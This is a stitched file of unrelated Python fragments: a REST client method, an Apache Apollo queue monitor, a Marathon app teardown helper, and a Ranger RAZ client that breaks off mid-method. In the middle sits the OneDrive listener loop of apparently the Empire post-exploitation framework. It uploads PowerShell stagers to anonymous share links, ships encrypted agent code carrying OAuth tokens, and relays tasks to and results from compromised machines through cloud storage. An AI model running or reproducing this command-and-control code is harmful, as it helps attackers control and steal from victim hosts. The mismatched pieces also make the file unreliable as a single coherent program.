        self.scheme = scheme
        self.auth_type = auth_type
        self.response_processor = response_processor
        self.retries_enabled = retries_enabled

    def connect(self):
        """Connect to api server, create http session pool.

        Returns:
            api server session
        """
        if self.retries_enabled:
            retry_strategy = Retry(
                total=3,
                status_forcelist=[429, 500, 502, 503, 504],
                # NOTE(review): `method_whitelist` was renamed to
                # `allowed_methods` in urllib3 1.26 and removed in 2.0 —
                # confirm the pinned urllib3 version still supports it.
                method_whitelist=[
                    "GET",
                    "PUT",
                    "DELETE",
                    "POST",
                ],
            )
            http_adapter = HTTPAdapter(
                pool_block=bool(self._pool_block),
                pool_connections=int(self._pool_connections),
                pool_maxsize=int(self._pool_maxsize),
                max_retries=retry_strategy,
            )
        else:
            http_adapter = HTTPAdapter(
                pool_block=bool(self._pool_block),
                pool_connections=int(self._pool_connections),
                pool_maxsize=int(self._pool_maxsize),
            )
        self.session = Session()
        if self.auth and self.auth_type == REQUEST.AUTH_TYPE.BASIC:
            self.session.auth = self.auth
        self.session.headers.update({"Content-Type": "application/json"})
        self.session.mount("http://", http_adapter)
        self.session.mount("https://", http_adapter)
        self.base_url = build_url(self.host, self.port, scheme=self.scheme)
        LOG.debug("{} session created".format(self.__class__.__name__))
        return self.session

    def close(self):
        """Close the session."""
        self.session.close()

    def _call(
        self,
        endpoint,
        method=REQUEST.METHOD.POST,
        cookies=None,
        request_json=None,
        request_params=None,
        verify=True,
        headers=None,
        files=None,
        timeout=(5, 30),  # (connection timeout, read timeout)
        ignore_error=False,
        warning_msg="",
    ):
        """Private method for making http request to calm

        Args:
            endpoint (str): calm server endpoint
            method (str): calm server http method
            cookies (dict): cookies that need to be forwarded.
            request_json (dict): request data
            request_params (dict): request params
        Returns:
            (tuple (requests.Response, dict)): Response
        """
        if request_params is None:
            request_params = {}
        request_json = request_json or {}
        LOG.debug("""Server Request- '{method}' at '{endpoint}' with body: '{body}'""".format(method=method, endpoint=endpoint, body=request_json))
        res = None
        err = None
        try:
            res = None
            url = build_url(self.host, self.port, endpoint=endpoint, scheme=self.scheme)
            LOG.debug("URL is: {}".format(url))
            # Per-call headers are merged into (and mutate) the session headers.
            base_headers = self.session.headers
            if headers:
                base_headers.update(headers)
            if method == REQUEST.METHOD.POST:
                if files is not None:
                    # Multipart upload path: merge file fields into the body
                    # and let MultipartEncoder pick the content type.
                    request_json.update(files)
                    m = MultipartEncoder(fields=request_json)
                    res = self.session.post(
                        url,
                        data=m,
                        verify=verify,
                        headers={"Content-Type": m.content_type},
                        timeout=timeout,
                    )
                else:
                    res = self.session.post(
                        url,
                        params=request_params,
                        data=json.dumps(request_json),
                        verify=verify,
                        headers=base_headers,
                        cookies=cookies,
                        timeout=timeout,
                    )
            elif method == REQUEST.METHOD.PUT:
                res = self.session.put(
                    url,
                    params=request_params,
                    data=json.dumps(request_json),
                    verify=verify,
                    headers=base_headers,
                    cookies=cookies,
                    timeout=timeout,
                )
            elif method == REQUEST.METHOD.GET:
                res = self.session.get(
                    url,
                    params=request_params or request_json,
                    verify=verify,
                    headers=base_headers,
                    cookies=cookies,
                    timeout=timeout,
                )
            elif method == REQUEST.METHOD.DELETE:
                res = self.session.delete(
                    url,
                    params=request_params,
                    data=json.dumps(request_json),
                    verify=verify,
                    headers=base_headers,
                    cookies=cookies,
                    timeout=timeout,
                )
            res.raise_for_status()
            # raise_for_status() throws on 4xx/5xx and jumps to the except
            # block, so this branch only runs for OK responses; the inner
            # debug line below is effectively unreachable.
            if not url.endswith("/download"):
                if not res.ok:
                    LOG.debug("Server Response: {}".format(res.json()))
        except ConnectTimeout as cte:
            LOG.error(
                "Could not establish connection to server at https://{}:{}.".
                format(self.host, self.port))
            LOG.debug("Error Response: {}".format(cte))
            sys.exit(-1)
        except Exception as ex:
            LOG.debug("Got traceback\n{}".format(traceback.format_exc()))
            # Prefer the server's JSON/text error body; fall back to str(ex).
            if hasattr(res, "json") and callable(getattr(res, "json")):
                try:
                    err_msg = res.json()
                except Exception:
                    err_msg = "{}".format(ex)
                    pass
            elif hasattr(res, "text"):
                err_msg = res.text
            else:
                err_msg = "{}".format(ex)
            status_code = res.status_code if hasattr(res, "status_code") else 500
            err = {"error": err_msg, "code": status_code}
            if ignore_error:
                if warning_msg:
                    LOG.warning(warning_msg)
                return None, err
            LOG.error("Oops! Something went wrong.\n{}".format(
                json.dumps(err, indent=4, separators=(",", ": "))))
        return res, err
def start_server(self, listenerOptions):
    """Run the OneDrive listener loop.

    Authenticates against the Microsoft identity endpoint, creates the
    base/staging/taskings/results folder structure in the OneDrive root,
    uploads the launcher and stager files, and then polls OneDrive forever:
    staging files are exchanged with agents, queued tasks are uploaded to
    the taskings folder, and agent results are downloaded from the results
    folder and handed to the agent handler.

    NOTE(review): this method blocks forever (two `while True` loops); it is
    presumably run on its own thread by the caller — confirm.
    """

    # Utility functions to handle auth tasks and initial setup
    def get_token(client_id, client_secret, code):
        # Exchange an OAuth2 authorization code for access/refresh tokens.
        params = {'client_id': client_id,
                  'client_secret': client_secret,
                  'grant_type': 'authorization_code',
                  'scope': 'files.readwrite offline_access',
                  'code': code,
                  'redirect_uri': redirect_uri}
        try:
            r = s.post('https://login.microsoftonline.com/common/oauth2/v2.0/token',
                       data=params)
            r_token = r.json()
            # Record absolute expiry (15 s early to leave a renewal margin)
            r_token['expires_at'] = time.time() + (int)(r_token['expires_in']) - 15
            # Mark that the (possibly new) refresh token must be persisted
            r_token['update'] = True
            return r_token
        except KeyError as e:
            # 'expires_in' missing means the token request failed
            print(helpers.color("[!] Something went wrong, HTTP response %d, error code %s: %s"
                                % (r.status_code, r.json()['error_codes'],
                                   r.json()['error_description'])))
            raise

    def renew_token(client_id, client_secret, refresh_token):
        # Exchange a refresh token for a fresh access/refresh token pair.
        params = {'client_id': client_id,
                  'client_secret': client_secret,
                  'grant_type': 'refresh_token',
                  'scope': 'files.readwrite offline_access',
                  'refresh_token': refresh_token,
                  'redirect_uri': redirect_uri}
        try:
            r = s.post('https://login.microsoftonline.com/common/oauth2/v2.0/token',
                       data=params)
            r_token = r.json()
            r_token['expires_at'] = time.time() + (int)(r_token['expires_in']) - 15
            r_token['update'] = True
            return r_token
        except KeyError as e:
            print(helpers.color("[!] Something went wrong, HTTP response %d, error code %s: %s"
                                % (r.status_code, r.json()['error_codes'],
                                   r.json()['error_description'])))
            raise

    def test_token(token):
        # Return True when the bearer token can read the drive metadata.
        headers = s.headers.copy()
        headers['Authorization'] = 'Bearer ' + token
        request = s.get("%s/drive" % base_url, headers=headers)
        return request.ok

    def setup_folders():
        # Ensure base/staging/taskings/results folders exist in OneDrive.
        if not (test_token(token['access_token'])):
            raise ValueError("Could not set up folders, access token invalid")
        base_object = s.get("%s/drive/root:/%s" % (base_url, base_folder))
        if not (base_object.status_code == 200):
            print(helpers.color("[*] Creating %s folder" % base_folder))
            params = {'@microsoft.graph.conflictBehavior': 'rename',
                      'folder': {},
                      'name': base_folder}
            base_object = s.post("%s/drive/items/root/children" % base_url,
                                 json=params)
        else:
            message = "[*] {} folder already exists".format(base_folder)
            signal = json.dumps({'print': True, 'message': message})
            dispatcher.send(signal,
                            sender="listeners/onedrive/{}".format(listener_name))
        for item in [staging_folder, taskings_folder, results_folder]:
            item_object = s.get("%s/drive/root:/%s/%s"
                                % (base_url, base_folder, item))
            if not (item_object.status_code == 200):
                print(helpers.color("[*] Creating %s/%s folder"
                                    % (base_folder, item)))
                params = {'@microsoft.graph.conflictBehavior': 'rename',
                          'folder': {},
                          'name': item}
                # Create the subfolder as a child of the base folder item
                item_object = s.post("%s/drive/items/%s/children"
                                     % (base_url, base_object.json()['id']),
                                     json=params)
            else:
                message = "[*] {}/{} already exists".format(base_folder, item)
                signal = json.dumps({'print': True, 'message': message})
                dispatcher.send(signal,
                                sender="listeners/onedrive/{}".format(listener_name))

    def upload_launcher():
        # Upload the PowerShell launcher and create an anonymous share link.
        ps_launcher = self.mainMenu.stagers.generate_launcher(
            listener_name, language='powershell', encode=False,
            userAgent='none', proxy='none', proxyCreds='none')
        r = s.put("%s/drive/root:/%s/%s/%s:/content"
                  % (base_url, base_folder, staging_folder, "LAUNCHER-PS.TXT"),
                  data=ps_launcher,
                  headers={"Content-Type": "text/plain"})
        if r.status_code == 201 or r.status_code == 200:
            item = r.json()
            r = s.post("%s/drive/items/%s/createLink" % (base_url, item['id']),
                       json={"scope": "anonymous", "type": "view"},
                       headers={"Content-Type": "application/json"})
            # NOTE(review): launcher_url is computed but never used or stored
            # (unlike stager_url below) — confirm whether this is intentional.
            launcher_url = "https://api.onedrive.com/v1.0/shares/%s/driveitem/content" % r.json()['shareId']

    def upload_stager():
        # Upload the stage-0 PowerShell stager and record its share URL.
        ps_stager = self.generate_stager(listenerOptions=listener_options,
                                         language='powershell',
                                         token=token['access_token'])
        r = s.put("%s/drive/root:/%s/%s/%s:/content"
                  % (base_url, base_folder, staging_folder, "STAGE0-PS.txt"),
                  data=ps_stager,
                  headers={"Content-Type": "application/octet-stream"})
        if r.status_code == 201 or r.status_code == 200:
            item = r.json()
            r = s.post("%s/drive/items/%s/createLink" % (base_url, item['id']),
                       json={"scope": "anonymous", "type": "view"},
                       headers={"Content-Type": "application/json"})
            stager_url = "https://api.onedrive.com/v1.0/shares/%s/driveitem/content" % r.json()['shareId']
            # Different domain for some reason?
            self.mainMenu.listeners.activeListeners[listener_name]['stager_url'] = stager_url
        else:
            print(helpers.color("[!] Something went wrong uploading stager"))
            message = r.content
            signal = json.dumps({'print': True, 'message': message})
            dispatcher.send(signal,
                            sender="listeners/onedrive/{}".format(listener_name))

    # Pull the listener configuration out of the options dictionary.
    listener_options = copy.deepcopy(listenerOptions)
    listener_name = listener_options['Name']['Value']
    staging_key = listener_options['StagingKey']['Value']
    poll_interval = listener_options['PollInterval']['Value']
    client_id = listener_options['ClientID']['Value']
    client_secret = listener_options['ClientSecret']['Value']
    auth_code = listener_options['AuthCode']['Value']
    refresh_token = listener_options['RefreshToken']['Value']
    base_folder = listener_options['BaseFolder']['Value']
    staging_folder = listener_options['StagingFolder']['Value'].strip('/')
    taskings_folder = listener_options['TaskingsFolder']['Value'].strip('/')
    results_folder = listener_options['ResultsFolder']['Value'].strip('/')
    redirect_uri = listener_options['RedirectURI']['Value']
    base_url = "https://graph.microsoft.com/v1.0"

    s = Session()

    # Obtain an access token: renew if we already hold a refresh token,
    # otherwise redeem the one-time authorization code.
    if refresh_token:
        token = renew_token(client_id, client_secret, refresh_token)
        message = "[*] Refreshed auth token"
        signal = json.dumps({'print': True, 'message': message})
        dispatcher.send(signal,
                        sender="listeners/onedrive/{}".format(listener_name))
    else:
        token = get_token(client_id, client_secret, auth_code)
        message = "[*] Got new auth token"
        signal = json.dumps({'print': True, 'message': message})
        # NOTE(review): this sender omits the listener name, unlike every
        # other dispatch in this method — confirm intentional.
        dispatcher.send(signal, sender="listeners/onedrive")

    s.headers['Authorization'] = "Bearer " + token['access_token']

    setup_folders()

    while True:
        # Wait until Empire is aware the listener is running, so we can save our refresh token and stager URL
        try:
            if listener_name in list(self.mainMenu.listeners.activeListeners.keys()):
                upload_stager()
                upload_launcher()
                break
            else:
                time.sleep(1)
        except AttributeError:
            time.sleep(1)

    while True:
        time.sleep(int(poll_interval))
        try:  # Wrap the whole loop in a try/catch so one error won't kill the listener
            if time.time() > token['expires_at']:  # Get a new token if the current one has expired
                token = renew_token(client_id, client_secret,
                                    token['refresh_token'])
                s.headers['Authorization'] = "Bearer " + token['access_token']
                message = "[*] Refreshed auth token"
                signal = json.dumps({'print': True, 'message': message})
                dispatcher.send(signal,
                                sender="listeners/onedrive/{}".format(listener_name))
                # Re-upload the stager since it embeds the access token
                upload_stager()
            if token['update']:
                # Persist the new refresh token into the listener options
                self.mainMenu.listeners.update_listener_options(
                    listener_name, "RefreshToken", token['refresh_token'])
                token['update'] = False

            # --- Agent staging: process files in the staging folder ---
            search = s.get("%s/drive/root:/%s/%s?expand=children"
                           % (base_url, base_folder, staging_folder))
            for item in search.json()['children']:  # Iterate all items in the staging folder
                try:
                    # Staging files are named <AGENTNAME>_<stage>.txt
                    # NOTE(review): the '.' before 'txt' is an unescaped regex
                    # metacharacter — matches any character; confirm intended.
                    reg = re.search("^([A-Z0-9]+)_([0-9]).txt", item['name'])
                    if not reg:
                        continue
                    agent_name, stage = reg.groups()
                    if stage == '1':  # Download stage 1, upload stage 2
                        message = "[*] Downloading {}/{}/{} {}".format(
                            base_folder, staging_folder, item['name'],
                            item['size'])
                        signal = json.dumps({'print': False,
                                             'message': message})
                        dispatcher.send(signal,
                                        sender="listeners/onedrive/{}".format(listener_name))
                        content = s.get(item['@microsoft.graph.downloadUrl']).content
                        lang, return_val = \
                            self.mainMenu.agents.handle_agent_data(staging_key, content, listener_options)[0]
                        message = "[*] Uploading {}/{}/{}_2.txt, {} bytes".format(
                            base_folder, staging_folder, agent_name,
                            str(len(return_val)))
                        signal = json.dumps({'print': False,
                                             'message': message})
                        dispatcher.send(signal,
                                        sender="listeners/onedrive/{}".format(listener_name))
                        s.put("%s/drive/root:/%s/%s/%s_2.txt:/content"
                              % (base_url, base_folder, staging_folder,
                                 agent_name),
                              data=return_val)
                        message = "[*] Deleting {}/{}/{}".format(
                            base_folder, staging_folder, item['name'])
                        signal = json.dumps({'print': False,
                                             'message': message})
                        dispatcher.send(signal,
                                        sender="listeners/onedrive/{}".format(listener_name))
                        s.delete("%s/drive/items/%s" % (base_url, item['id']))
                    if stage == '3':  # Download stage 3, upload stage 4 (full agent code)
                        message = "[*] Downloading {}/{}/{}, {} bytes".format(
                            base_folder, staging_folder, item['name'],
                            item['size'])
                        signal = json.dumps({'print': False,
                                             'message': message})
                        dispatcher.send(signal,
                                        sender="listeners/onedrive/{}".format(listener_name))
                        content = s.get(item['@microsoft.graph.downloadUrl']).content
                        lang, return_val = \
                            self.mainMenu.agents.handle_agent_data(staging_key, content, listener_options)[0]
                        session_key = self.mainMenu.agents.agents[agent_name]['sessionKey']
                        agent_token = renew_token(
                            client_id, client_secret,
                            token['refresh_token'])  # Get auth and refresh tokens for the agent to use
                        agent_code = str(
                            self.generate_agent(listener_options, client_id,
                                                client_secret,
                                                agent_token['access_token'],
                                                agent_token['refresh_token'],
                                                redirect_uri, lang))
                        # Encrypt the full agent with the per-agent session key
                        enc_code = encryption.aes_encrypt_then_hmac(session_key,
                                                                    agent_code)
                        message = "[*] Uploading {}/{}/{}_4.txt, {} bytes".format(
                            base_folder, staging_folder, agent_name,
                            str(len(enc_code)))
                        signal = json.dumps({'print': False,
                                             'message': message})
                        dispatcher.send(signal,
                                        sender="listeners/onedrive/{}".format(listener_name))
                        s.put("%s/drive/root:/%s/%s/%s_4.txt:/content"
                              % (base_url, base_folder, staging_folder,
                                 agent_name),
                              data=enc_code)
                        message = "[*] Deleting {}/{}/{}".format(
                            base_folder, staging_folder, item['name'])
                        signal = json.dumps({'print': False,
                                             'message': message})
                        dispatcher.send(signal,
                                        sender="listeners/onedrive/{}".format(listener_name))
                        s.delete("%s/drive/items/%s" % (base_url, item['id']))
                except Exception as e:
                    print(helpers.color("[!] Could not handle agent staging for listener %s, continuing" % listener_name))
                    message = traceback.format_exc()
                    signal = json.dumps({'print': False, 'message': message})
                    dispatcher.send(signal,
                                    sender="listeners/onedrive/{}".format(listener_name))

            agent_ids = self.mainMenu.agents.get_agents_for_listener(listener_name)

            # --- Taskings: upload queued tasks for each known agent ---
            for agent_id in agent_ids:  # Upload any tasks for the current agents
                if isinstance(agent_id, bytes):
                    agent_id = agent_id.decode('UTF-8')
                task_data = self.mainMenu.agents.handle_agent_request(
                    agent_id, 'powershell', staging_key, update_lastseen=True)
                if task_data:
                    try:
                        r = s.get("%s/drive/root:/%s/%s/%s.txt:/content"
                                  % (base_url, base_folder, taskings_folder,
                                     agent_id))
                        if r.status_code == 200:
                            # If there's already something there, download and append the new data
                            task_data = r.content + task_data
                        message = "[*] Uploading agent tasks for {}, {} bytes".format(
                            agent_id, str(len(task_data)))
                        signal = json.dumps({'print': False,
                                             'message': message})
                        dispatcher.send(signal,
                                        sender="listeners/onedrive/{}".format(listener_name))
                        r = s.put("%s/drive/root:/%s/%s/%s.txt:/content"
                                  % (base_url, base_folder, taskings_folder,
                                     agent_id),
                                  data=task_data)
                    except Exception as e:
                        message = "[!] Error uploading agent tasks for {}, {}".format(agent_id, e)
                        signal = json.dumps({'print': False,
                                             'message': message})
                        dispatcher.send(signal,
                                        sender="listeners/onedrive/{}".format(listener_name))

            # --- Results: download and process agent result files ---
            search = s.get("%s/drive/root:/%s/%s?expand=children"
                           % (base_url, base_folder, results_folder))
            for item in search.json()['children']:  # For each file in the results folder
                try:
                    agent_id = item['name'].split(".")[0]
                    # NOTE(review): this re-decodes agent_ids on every item of
                    # the outer loop; on a second pass the entries are already
                    # str and .decode would raise (silenced by the broad
                    # except below) — confirm this is the intended behavior.
                    for i in range(len(agent_ids)):
                        agent_ids[i] = agent_ids[i].decode('UTF-8')
                    if not agent_id in agent_ids:  # If we don't recognize that agent, upload a message to restage
                        print(helpers.color("[*] Invalid agent, deleting %s/%s and restaging"
                                            % (results_folder, item['name'])))
                        s.put("%s/drive/root:/%s/%s/%s.txt:/content"
                              % (base_url, base_folder, taskings_folder,
                                 agent_id),
                              data="RESTAGE")
                        s.delete("%s/drive/items/%s" % (base_url, item['id']))
                        continue
                    try:  # Update the agent's last seen time, from the file timestamp
                        seen_time = datetime.strptime(item['lastModifiedDateTime'],
                                                      "%Y-%m-%dT%H:%M:%S.%fZ")
                    except:  # sometimes no ms for some reason...
                        seen_time = datetime.strptime(item['lastModifiedDateTime'],
                                                      "%Y-%m-%dT%H:%M:%SZ")
                    seen_time = helpers.utc_to_local(seen_time)
                    self.mainMenu.agents.update_agent_lastseen_db(agent_id,
                                                                  seen_time)
                    # If the agent is just checking in, the file will only be 1 byte, so no results to fetch
                    if (item['size'] > 1):
                        message = "[*] Downloading results from {}/{}, {} bytes".format(
                            results_folder, item['name'], item['size'])
                        signal = json.dumps({'print': False,
                                             'message': message})
                        dispatcher.send(signal,
                                        sender="listeners/onedrive/{}".format(listener_name))
                        r = s.get(item['@microsoft.graph.downloadUrl'])
                        self.mainMenu.agents.handle_agent_data(
                            staging_key, r.content, listener_options,
                            update_lastseen=True)
                        message = "[*] Deleting {}/{}".format(results_folder,
                                                              item['name'])
                        signal = json.dumps({'print': False,
                                             'message': message})
                        dispatcher.send(signal,
                                        sender="listeners/onedrive/{}".format(listener_name))
                        s.delete("%s/drive/items/%s" % (base_url, item['id']))
                except Exception as e:
                    message = "[!] Error handling agent results for {}, {}".format(item['name'], e)
                    signal = json.dumps({'print': False, 'message': message})
                    dispatcher.send(signal,
                                    sender="listeners/onedrive/{}".format(listener_name))

        except Exception as e:
            # Best-effort: log and keep the listener loop alive
            print(helpers.color("[!] Something happened in listener %s: %s, continuing"
                                % (listener_name, e)))
            message = traceback.format_exc()
            signal = json.dumps({'print': False, 'message': message})
            dispatcher.send(signal,
                            sender="listeners/onedrive/{}".format(listener_name))

    # NOTE(review): unreachable — the polling loop above never breaks.
    s.close()
class ApolloMonitor(object):
    """Monitor an Apache Apollo broker's queues over its REST management API.

    Periodically downloads queue data for one virtual host and fires the
    ``on_queue_init`` / ``on_queue_new`` / ``on_queue_update`` /
    ``on_queue_empty`` / ``on_queue_delete`` event handlers, which
    subclasses may override.
    """

    def __init__(self, host, virtual_host, port=61680, realm='Apollo',
                 username='******', password='******', update_interval_s=5):
        """Construct a new ApolloMonitor that monitors the $virtual_host
        virtual-host on the Apollo server at $host:$port with credentials
        $username and $password.  Monitor for update events every
        $update_interval_s seconds (or, if seconds is None, not at all).

        NOTE(review): ``realm`` is kept for interface compatibility but is
        not used — requests below authenticate with HTTP basic auth only.
        """
        # Prepare the authenticated session and endpoint URLs
        self.auth = (username, password)
        self._url = ('http://%s:%d/broker/virtual-hosts/%s'
                     % (host, port, virtual_host))
        self._url_queues = self._url + '/queues.json'
        self._url_delete = self._url + '/queues/%s.json'
        self._s = Session()
        # Initialize the queue status dictionary and announce initial queues
        self.queues = self._structure_queue_data(self._get_queue_data())
        for queue in self.queues.values():
            self.on_queue_init(queue)
        # Event set (then immediately cleared) after each completed update,
        # so wait_for_update() can block on it
        self.update_event = Event()
        self.update_event.clear()
        # Run updates in a loop (None disables periodic polling)
        if update_interval_s is not None:
            call_periodic(update_interval_s, self.do_update)

    def _get_queue_data(self):
        """Return a parsed structure containing the current queue data.

        Grows the requested page size until a single request covers all
        rows, so the returned list is complete.
        """
        page_size = -1
        total_rows = 0
        # Repeat until a full download is accomplished
        while page_size < total_rows:
            # Request 1000 rows more than the last reported total
            page_size = total_rows + 1000
            url = self._url_queues + ('?ps=%d' % page_size)
            # Get the JSON-formatted data; `.json` is a method on modern
            # requests and was a property on very old versions, so support both
            queues = self._s.get(url, auth=self.auth).json
            if callable(queues):
                queues = queues()
            # Extract the new page size and row counts
            page_size = queues['page_size']
            total_rows = queues['total_rows']
        # Operation Complete!
        return queues['rows']

    def _structure_queue_data(self, queues, exclude_temp=True):
        """Construct a dictionary mapping destination names to a queue data
        structure, optionally excluding temporary ('temp.*') destinations."""
        return dict((q['id'], q) for q in queues
                    if not exclude_temp or not q['id'].startswith('temp.'))

    def _detect_queue_changes(self, new_queues):
        """Fire events for handling new, updated, and deleted queues."""
        # We will send a blank logging message if there is at least one event
        any_events = False
        # Keep a list of the old queues
        old_queues = set(self.queues.keys())
        # Iterate over new_queues
        for q_id in new_queues:
            queue = new_queues[q_id]
            if q_id in old_queues:
                # Detect a modified queue and report the update
                self.on_queue_update(self.queues[q_id], queue)
                old_queues.remove(q_id)
                any_events |= True
            else:
                # Report the new queue
                self.on_queue_new(queue)
                any_events |= True
            self.queues[q_id] = queue
        # Anything left in old_queues no longer exists on the broker
        for q_id in old_queues:
            self.on_queue_delete(self.queues[q_id])
            self.queues.pop(q_id)
            any_events |= True
        # Send a blank logging message if there were any events
        # (This causes logging output to appear in stanzas)
        if any_events:
            logger.debug('')

    def do_update(self):
        """Download new queue data and send update notifications."""
        new_queues = self._structure_queue_data(self._get_queue_data())
        self._detect_queue_changes(new_queues)
        # Report update event to blockers (pulse: set, then clear)
        self.update_event.set()
        self.update_event.clear()

    def on_queue_init(self, queue):
        """MAY override: called after the ApolloMonitor is initializing and
        loading in the initial queue status"""
        logger.debug('on_queue_init( "%s" )' % queue['id'])
        # logger.debug('on_queue_init( %s )' % repr(queue))

    def on_queue_new(self, queue):
        """MAY override: called before a new queue is added to the status
        dictionary"""
        logger.debug('on_queue_new( "%s" )' % queue['id'])
        # logger.debug('on_queue_new( %s )' % repr(queue))

    def on_queue_update(self, old_queue, new_queue):
        """MAY override: called before a queue is updated in the status
        dictionary.  Overrides MUST call the super of this event handler so
        that on_queue_empty events may be fired."""
        logger.debug('on_queue_update( "%s", ... ): %d items'
                     % (old_queue['id'],
                        old_queue['metrics']['queue_items']))
        # logger.debug('on_queue_update( %s, %s )'
        #              % (repr(old_queue), repr(new_queue)))
        # if the queue is now empty, and something has been dequeued since
        # the last queue update, then it qualifies as "this is now empty"
        if ((new_queue['metrics']['queue_items'] == 0) and
                (old_queue['metrics']['dequeue_item_counter'] !=
                 new_queue['metrics']['dequeue_item_counter'])):
            self.on_queue_empty(new_queue)

    def on_queue_empty(self, queue):
        """MAY override: called before a queue is update in the status
        dictionary when the queue is newly empty."""
        logger.debug('on_queue_empty( "%s" )' % queue['id'])
        # logger.debug('on_queue_empty( %s )' % repr(queue))

    def on_queue_delete(self, old_queue):
        """MAY override: called before a queue is deleted from the status
        dictionary"""
        logger.debug('on_queue_delete( "%s" )' % old_queue['id'])
        # logger.debug('on_queue_delete( %s )' % repr(old_queue))

    def delete_queue(self, queue):
        """Delete a given queue.  Returns the status code of the request
        (likely either 204 on success or 404 if the queue doesn't exist)."""
        # Minimal percent-escaping so a literal '%' survives the URL.
        # TODO(review): consider full urllib quoting for other reserved chars.
        queue = queue.replace('%', '%25')
        # Bug fix: the response was previously discarded even though the
        # docstring promises the status code — return it.
        return self._s.delete(self._url_delete % queue,
                              auth=self.auth).status_code

    def delete(self, destination):
        """Delete a given destination (queue, topic, or dsub), given in the
        form '/<kind>/<name>' (e.g. '/queue/foo').  Returns the response
        status code, for consistency with delete_queue()."""
        # mostly copied from delete_queue
        destination = destination.replace('%', '%25')
        empty, thing, dest = destination.split('/')
        return self._s.delete(self._url + ('/%ss/%s.json' % (thing, dest)),
                              auth=self.auth).status_code

    def wait_for_update(self, n=1):
        """Wait for n updates to be fetched and sent through event handlers."""
        # Bug fix: `xrange` is Python-2-only (NameError on Python 3);
        # `range` behaves identically for this loop on both versions.
        for it in range(n):
            self.update_event.wait()
def teardown_marathon_tf_session(marathon_url_str, marathon_usr,
                                 marathon_usrpwd, tsknom_str, tsk_idx):
    """Delete the Marathon app '<tsknom_str><tsk_idx>' for a TF session.

    The ``marathon://`` scheme in *marathon_url_str* is rewritten to
    ``http://`` before issuing the DELETE against the Marathon v2 API.

    Returns the requests.Response from the DELETE so callers can check the
    outcome (previously the response was computed and silently discarded).
    """
    # Use the session as a context manager so the connection pool is
    # released (it previously leaked the Session).
    with Session() as s:
        marathon_url_str = marathon_url_str.replace("marathon://", "http://")
        resp = s.delete(url='%s/v2/apps/%s%d' % (marathon_url_str,
                                                 tsknom_str, tsk_idx),
                        auth=HTTPBasicAuth(marathon_usr, marathon_usrpwd))
    return resp
class RangerRazClient:
    """Client for the Apache Ranger RAZ (authorization) REST service.

    Supports Hadoop-style delegation-token management (get / renew /
    cancel, which require a Kerberos-authenticated session) and privilege
    checks for individual or batched access requests.
    """

    def __init__(self, url, auth):
        # Base service URL and the auth object (e.g. HTTPKerberosAuth)
        self.url = url
        self.session = Session()
        self.session.auth = auth
        # Quiet per-request logging from the requests library
        logging.getLogger("requests").setLevel(logging.WARNING)

    def get_delegation_token(self, renewer, dtServiceName=None, doAsUser=None):
        """Obtain a delegation token; requires Kerberos authentication.

        Returns the parsed response, or None when not Kerberos-authenticated.
        """
        resp = None
        if self.__is_kerberos_authenticated():
            resp = self.__call_api(
                RangerRazClient.GET_DELEGATION_TOKEN,
                self.__get_query_params(
                    {
                        # Bug fix: the 'op' query parameter must carry the
                        # operation name string, not the API descriptor
                        # object (the OP_* constants were defined but unused).
                        RangerRazClient.PARAM_OP:
                            RangerRazClient.OP_GETDELEGATIONTOKEN,
                        RangerRazClient.PARAM_RENEWER: renewer,
                        RangerRazClient.PARAM_DT_SERVICENAME: dtServiceName
                    }, doAsUser))
        else:
            LOG.error(
                "Kerberos Authentication is required to get RAZ delegation token"
            )
        return resp

    def renew_delegation_token(self, delegation_token, doAsUser=None):
        """Renew an existing delegation token; requires Kerberos auth."""
        resp = None
        if self.__is_kerberos_authenticated():
            resp = self.__call_api(
                RangerRazClient.RENEW_DELEGATION_TOKEN,
                self.__get_query_params(
                    {
                        # Bug fix: send the operation name string (see above)
                        RangerRazClient.PARAM_OP:
                            RangerRazClient.OP_RENEWDELEGATIONTOKEN,
                        RangerRazClient.PARAM_TOKEN: delegation_token
                    }, doAsUser))
        else:
            LOG.error(
                "Kerberos Authentication is required to renew RAZ delegation token"
            )
        return resp

    def cancel_delegation_token(self, delegation_token, doAsUser=None):
        """Cancel an existing delegation token; requires Kerberos auth."""
        resp = None
        if self.__is_kerberos_authenticated():
            resp = self.__call_api(
                RangerRazClient.CANCEL_DELEGATION_TOKEN,
                self.__get_query_params(
                    {
                        # Bug fix: send the operation name string (see above)
                        RangerRazClient.PARAM_OP:
                            RangerRazClient.OP_CANCELDELEGATIONTOKEN,
                        RangerRazClient.PARAM_TOKEN: delegation_token
                    }, doAsUser))
        else:
            LOG.error(
                "Kerberos Authentication is required to cancel RAZ delegation token"
            )
        return resp

    def check_privilege(self, raz_request, doAsUser=None):
        """Evaluate a single access request; returns a RangerRazResult."""
        resp = self.__call_api(
            RangerRazClient.CHECK_PRIVILEGE.format_path(
                {'serviceType': raz_request.serviceType}),
            query_params=self.__get_query_params(None, doAsUser),
            request_data=raz_request)
        return type_coerce(resp, RangerRazResult)

    def check_privileges(self, raz_requests, doAsUser=None):
        """Evaluate a batch of access requests; returns RangerRazResults.

        NOTE(review): all requests in the batch are assumed to target the
        same serviceType — the first request's serviceType selects the URL
        path; confirm against the server contract.
        """
        # Bug fix: this previously referenced the undefined name
        # 'raz_request' (NameError at runtime); use the first request.
        resp = self.__call_api(
            RangerRazClient.CHECK_PRIVILEGES.format_path(
                {'serviceType': raz_requests[0].serviceType}),
            query_params=self.__get_query_params(None, doAsUser),
            request_data=raz_requests)
        return type_coerce_list(resp, RangerRazResult)

    def __is_kerberos_authenticated(self):
        """Return True when the session is configured for Kerberos auth."""
        from requests_kerberos import HTTPKerberosAuth
        return isinstance(self.session.auth, HTTPKerberosAuth)

    def __get_query_params(self, query_params, doAsUser=None):
        """Merge the optional doAs user into the query-parameter dict."""
        if doAsUser is not None:
            query_params = query_params or {}
            query_params[RangerRazClient.PARAM_DOAS] = doAsUser
        return query_params

    def __call_api(self, api, query_params=None, request_data=None):
        """Issue one HTTP call described by *api* and return parsed JSON.

        Returns None on no response or a 503; raises RangerRazException for
        any other unexpected status or an unparsable body.
        """
        ret = None
        params = {
            'headers': {
                'Accept': api.consumes,
                'Content-type': api.produces
            }
        }
        if query_params:
            params['params'] = query_params
        if request_data:
            params['data'] = json.dumps(request_data)
        path = os.path.join(self.url, api.path)
        if LOG.isEnabledFor(logging.DEBUG):
            LOG.debug("------------------------------------------------------")
            LOG.debug("Call         : %s %s", api.method, path)
            LOG.debug("Content-type : %s", api.consumes)
            LOG.debug("Accept       : %s", api.produces)
        response = None
        if api.method == HttpMethod.GET:
            response = self.session.get(path, **params)
        elif api.method == HttpMethod.POST:
